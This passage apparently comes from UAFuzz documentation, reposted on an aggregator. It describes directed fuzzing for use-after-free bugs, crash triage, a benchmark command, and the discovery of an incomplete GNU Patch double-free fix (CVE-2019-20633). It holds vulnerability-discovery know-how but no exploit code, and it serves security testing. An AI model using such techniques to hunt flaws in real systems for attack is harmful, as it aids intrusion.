After the fuzzing timeout, UAFuzz can identify which inputs cover in sequence all target locations of the expected UAF bug trace (e.g., input name that ends with ',all'). Thus, UAFuzz only triages those kinds of inputs that are likely to trigger the desired bug by using existing profiling tools like Valgrind or AddressSanitizer.


Application 2: Patch testing

We use CVE-2018-6952 of GNU Patch to illustrate the importance of producing different unique bug-triggering inputs to favor the repair process. There was a double free in GNU Patch which has been fixed by developers (commit 9c98635). However, by using the stack traces of CVE-2018-6952, UAFuzz discovered an incomplete bug fix CVE-2019-20633 of the latest version 2.7.6 (commit 76e7758), with a slight difference of the bug trace. Overall, the process is similar to the bug reproduction application, except that some manual work could be required in identifying target UAF bug trace. We use PoC inputs of existing bugs and valid files in fuzzing-corpus as high quality seeds.

# Fuzz patched version of CVE-2018-6952
$UAFBENCH_PATH/CVE-2019-20633.sh uafuzz 360 $UAFBENCH_PATH/valgrind/CVE-2018-6952.valgrind

Application 3: Static analysis report verification

A possible hybrid approach is to combine UAFuzz with GUEB which is the only binary-level static analyzer written in Ocaml for UAF. However, GUEB produces many false positives and is currently not able to work properly with complex binaries. So we currently improve and integrate GUEB into BINSEC and then use targets extracted from GUEB's reports to guide UAFuzz. Stay tuned!



Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>